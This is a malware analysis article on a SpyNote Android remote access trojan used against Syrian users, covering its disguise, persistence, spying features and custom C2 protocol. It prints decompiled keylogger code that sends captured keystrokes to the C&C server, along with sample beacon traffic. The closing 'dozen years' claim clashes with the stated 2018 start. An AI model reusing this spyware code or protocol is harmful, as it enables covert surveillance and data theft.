1/11
An in-depth analysis of SpyNote remote access trojan
bulldogjob.pl/articles/1200-an-in-depth-analysis-of-spynote-remote-access-trojan
Techniczne
Lookout researchers have recently discovered a surveillance campaign targeting Syrian citizens and it is believed that the actor behind the
attack was state-sponsored. The campaign had been active since January 2018 and its goal was to infect Android mobile devices with remote
access trojans (RATs) and then spy on people in possession of those devices.
The victims were tricked into downloading and installing innocent-looking mobile applications which were actually spyware. The applications
were shared through various communication channels; however, they were never available on the official Google Play Store. Some
applications attempted to masquerade as legitimate ones like Telegram, others were COVID-19 contact tracing apps or benign tools like a fake
digital thermometer, and others impersonated Android built-in tools. The common factor was that all of them had an additional functionality:
allowing the adversary to spy on the users who installed them.
In this article we will examine the internal workings of one of those applications to analyze its capabilities and understand how it is used by the
threat actors.
What is a remote access trojan (RAT)?
A Remote Access Trojan (RAT) is a type of malware that controls a system through a remote network connection. A RAT is typically installed
without the victim's knowledge, often as payload of a trojan horse program, and will try to hide its operation from the victim and from security
software and other anti-virus software.
A RAT enables its operators to perform many activities on the compromised device (e.g. control a device's camera, access its storage,
intercept calls and text messages, etc.). This is all done via an easy-to-use application hosted on a command and control server.
Executive summary
A sample Android application was chosen for analysis from a pool of 71 malicious ones reported by Lookout’s research. The sample examined
is an instance of the SpyNote RAT.
Chosen application details:
https://bulldogjob.pl/articles/1200-an-in-depth-analysis-of-spynote-remote-access-trojan
https://bulldogjob.pl/readme/s/categories,tech
https://blog.lookout.com/nation-state-mobile-malware-targets-syrians-with-covid-19-lures
https://blog.malwarebytes.com/threats/remote-access-trojan-rat/
2/11
After the application is installed, it is displayed as Android with the icon resembling the one of the built-in Android applications Settings .
Malware icon
AndroidManifest.xml file reveals that malware takes advantage of a number of permissions, allowing it to have, among others, the
following capabilities:
track location of the device (GPS and network-based)
make and intercept calls
access camera
access external storage
access contact list
read SMS
access microphone
displaying content over other applications
clickjacking via Accessibility Services
Technical details
https://www.makeuseof.com/tag/android-accessibility-services-can-used-hack-phone/
3/11
While the distribution channel for the application sample remains unknown, it was surely never available on the official Google Play Store.
Most likely, the malware was spread via other means like a spearphishing attachment or a link.
A SpyNote client can masquerade as legitimate application. Static code analysis indicates that the malware, after successful installation, would
install a legitimate application embedded in the APK file at res/raw/google.apk . Also, screenshots of cracked SpyNote server v6.4.4
proves that functionality:
APK builder
The adversary can pick a name of the application, service, its version, and the name of a victim to be able to differentiate them. This value can
be extracted from the res/values/strings.xml file. In this particular example they were set as follows:
Hamody
Android
Android
6.4.4
This sample did not include any additional applications and the file res/raw/google.apk was empty.
google.apk file details
It was left was so that the malware, when executed, simply loads the legitimate android.settings.ACCESSIBILITY_SETTINGS intent:
https://www.youtube.com/watch?v=zJXk4FCHx_0
4/11
Accessibility intent
Code running accessibility intent
Android applications, including malware, can listen for the BOOT_COMPLETED broadcast event to ensure the application will be activated
upon device start up, and this is the technique that SpyNote utilizes to achieve its persistence mechanism. As per the AndroidManifest.xml
file, the class that is receiving the BOOT_COMPLETED event is com.android.tester.C4 :
This class waits for the BOOT_COMPLETED broadcast, checks if the com.android.tester.C11 service is already running, and, if not, initiates
it. The service is responsible for processing commands received from the C2 server and is also the class where most of the code resides.
com.android.tester.C4 class
code
5/11
SpyNote is able to discover installed applications, so that the attackers can tell which security appliances are deployed to a device. A reason
for collection of the list of applications may be to discover high value applications like banking or messaging software. Application discovery is
achieved by using the PackageManager class:
Application discovery code
The above code not only extracts names of the installed applications, but also their installation dates and icons. This is what the operators
controlling the device see:
List of extracted applications
There is a large quantity of other data that malware extracts, most likely for the operators to be able to easily tell that it is running in a virtual
machine. The following are main information categories that the adversary takes advantage of:
device
system
SIM
WiFi
audio
Bluetooth
location
https://www.youtube.com/watch?v=zJXk4FCHx_0
6/11
For most Android Virtual Devices (AVDs), the data above will not vary too much by default and it is more than enough information to determine
whether the infected system is a real mobile device or an emulator.
Extracted device information
It can also be seen on the footage that the tool embedded in SpyNote's C2 can be used to generate APKs. It is highly customizable and allows
the attacker to choose whether the application should be hidden or not. Other possibilities include enabling key logging, device administration,
leveraging SuperSU if the device is rooted, and deactivating icons.
SpyNote APK builder
SpyNote operators can use Device Administrator access to wipe data, lock it, or reset the password:
Device Administrator actions
https://www.youtube.com/watch?v=zJXk4FCHx_0
7/11
SpyNote makes use of the accessibility API by overriding onAccessibilityEvent method to log keystrokes. The logs are saved to external
storage to file configdd-MM-yyy.log where dd-MM-yyyy is the date of when the keystrokes were captured. The data can then be downloaded
by the malware operators.
public void onAccessibilityEvent(AccessibilityEvent accessibilityEvent) {
try {
String a = m1819a(accessibilityEvent); // accessibilityEvent.getText().toString();
String str = (String) accessibilityEvent.getPackageName();
StringBuilder sb = new StringBuilder();
if (a.startsWith("[") && a.endsWith("]")) {
a = a.substring(1, a.length() - 1);
}
if (!this.f1163b.equals(a)) {
this.f1163b = a;
if (str != null && a.length() != 0) {
String format = new SimpleDateFormat("HH:mm a", Locale.ENGLISH).format(new Date());
String str2 = new String("-1");
if (getApplicationContext().getResources().getString(R.string.gp).charAt(2) == '0') {
// redacted application icon extraction
}
if (str != null && a != null && format != null) {
if (C11.f1164A) {
C11.m1858a(C11.m1851a(C11.f1181m, 50) + C11.f1175f + C11.m1851a(C11.f1181m, 115) + C11.f1175f + str2 +
C11.f1177h + a + C11.f1177h + str + C11.f1177h + format); // send to C&C
}
sb.append(str2 + C11.f1177h + a + C11.f1177h + str + C11.f1177h + format + C11.f1176g);
String string2 = getApplicationContext().getResources().getString(R.string.s);
if ("mounted".equals(Environment.getExternalStorageState())) {
File file = new File(Environment.getExternalStorageDirectory().getAbsolutePath() + "/" +
string2.trim());
if (!file.exists()) {
file.mkdirs();
}
try {
String format = new SimpleDateFormat("dd-MM-yyyy", Locale.ENGLISH).format(new Date());
String string = getApplicationContext().getResources().getString(R.string.s);
File file = new File(Environment.getExternalStorageDirectory().getAbsolutePath() + "/" +
string.trim());
if (file.exists()) {
FileWriter fileWriter = new FileWriter(file.getPath() + "/config" + format + ".log", true);
fileWriter.write(sb.toString());
fileWriter.close();
}
} catch (IOException unused) {
}
}
}
}
}
} catch (Exception unused) {
}
}
The spyware has a File Manager feature allowing access to files like application data, pictures, downloads, and others, that are kept in the
external storage:
8/11
File Manager feature code
File Manager as seen by the attackers
SpyNote has a location tracking feature based on GPS and network data. The location data is obtained by registering LocationListener
using requestLocationUpdates method from LocationManager class.
Moreover, a remote command can be issued to capture audio or camera feed. The code is designed to allow live footage to be obtained from
all cameras available on a device with additional capabilities like zoom, flash etc.
9/11
Audio recording code
The collected data exfiltration is achieved over the command and control channel. All commands and data are sent via the normal
communications channel. All traffic sent by a victim's device is compressed before being sent using java.util.zip.GZIPOutputStream class:
Data compression code
Command and control (C2, C&C) traffic is sent over an uncommonly used port tcp/215, but it is also possible for SpyNote to communicate via
any other TCP port. The IP address and port are chosen during the APK building process:
C2 server configuration
SpyNote uses a custom TCP protocol for C&C communications:
10/11
SpyNote protocol visualization
The traffic always starts with the payload size followed by a 0x00 null byte. The payload from a victim to the C2 server is always GZIP
DEFLATE-compressed and, thus, starts with 0x1f8b08 bytes.
The above payload was the initial one sent to the C2 and can be easily decompressed:
$ echo
"1f8b0800000000000000ad56c9d6ab380e7e957f559b2c98032c0d98314098033b8600614e026178fa22b953dfdb7d4ed7a2744e6c7db290654976
| xxd -r -p | zcat
1025310249null10249100&false10249w410249510249null &
null10249/9j/4AAQSkZJRgABAQAAAQABAAD/4gIoSUNDX1BST0ZJTEUAAQEAAAIYAAAAAAIQAABtbnRyUkdCIFhZWiAAAAAAAAAAAAAAAAB
Android SDK built for x861024910 & 2910249f60598b565b235cd102491024910248null
The above base64 string is an encoded JPG file containing a part of the device's screen:
Extracted part of the device screen
After the initial payload is sent to the C2 server, the beaconing activity between the device and the C&C server begins:
Beaconing traffic
The server sends 35 00 70 6f 69 6e 67 which is similar to the described protocol above:
0x35 - payload size (5 ASCII)
0x00 - null byte
0x706f696e67 - poing in ASCII
The victim responds with:
https://tools.ietf.org/html/rfc1952#section-2.2
https://tools.ietf.org/html/rfc4648
11/11
0x3333001f8b08000000000000002b28cd2d30343032b1c82bcdc901007d342eed0d000000
0x3333 - payload size (33 ASCII)
0x00 - null byte
0x1f8b08000000000000002b28cd2d30343032b1c82bcdc901007d342eed0d000000 - GZIP compressed string pump10248null
Conclusion
Analysis of the SpyNote sample indicates that the threat actors behind the surveillance campaign had extensive control over victims' devices.
Not only does this piece of malware have considerable features, but it is also highly customizable to evade detection and deceive victims into
downloading, installing, and providing full access to their devices. Having that in mind, it should not be surprising that the adversary was able
to run the campaign for over a dozen years. It is also clear that users should be educated not to install mobile applications from non-official
application stores. Moreover, Device Administrator privilege should only be granted to, if any, trusted applications.
Detection
Indicators of compromise (IOCs)
MITRE ATT&CK Techniques